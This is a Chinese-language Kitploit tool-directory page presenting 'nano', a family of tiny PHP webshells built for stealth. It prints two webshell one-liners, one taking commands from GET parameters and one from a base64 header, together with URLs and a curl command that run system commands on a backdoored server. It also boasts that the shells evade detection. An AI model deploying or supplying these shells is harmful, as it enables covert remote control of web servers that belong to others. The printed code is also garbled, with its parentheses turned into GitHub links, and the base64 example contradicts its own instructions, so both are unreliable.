Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
nano — Nano 是一系列 PHP WebShell,其代码经过代码高尔夫式精简以实现隐蔽性。 | Kitploit
工具/GitHubGitHub/s0md3v/nano
Payload生成ShellcodeWeb应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubs0md3v/nano

nano

Nano 是一系列 PHP WebShell,其代码经过代码高尔夫式精简以实现隐蔽性。

查看仓库
4499156年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

nano

Nano 是一个 PHP webshell 家族,经过代码高尔夫优化,极其隐蔽且高效。
也许可以关注一下,我会继续在这里上传更多 webshell。

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/master/%24GET_%5Bc%5D);

特性

  • 体积仅 35 字节
  • 无法被静态代码扫描器检测
  • 支持身份验证

用法

http://example.com/nano.php?f=function&c=command&p=password

f 代表函数
c 代表命令
p 代表密码

例如,下面的代码将执行 ls 命令:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/master/%24x%5B1%5D);

特性

  • 体积仅 93 字节
  • 完全无法被检测

用法

这个稍微复杂一点。
假设你想运行 system(ls),那么就把它写成 system~ls,然后进行 base64 编码,即 c3lzdGVtKGxzKQ==
现在在它的开头添加任意 1 个字符。比如说 'x',那么它就会变成 xc3lzdGVtKGxzKQ==
现在打开你的终端并输入以下命令
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
太麻烦了?你可以改用 handler。

handler

其他内容

这是我第一次写 PHP 相关的小玩意儿,所以如果你有更好的方式来实现我所做的事情,请告诉我或发起 pull request。
nano 项目采用 MIT 许可证 授权,这基本上意味着如果你想重新分发或修改它,必须给我署名。

下载工具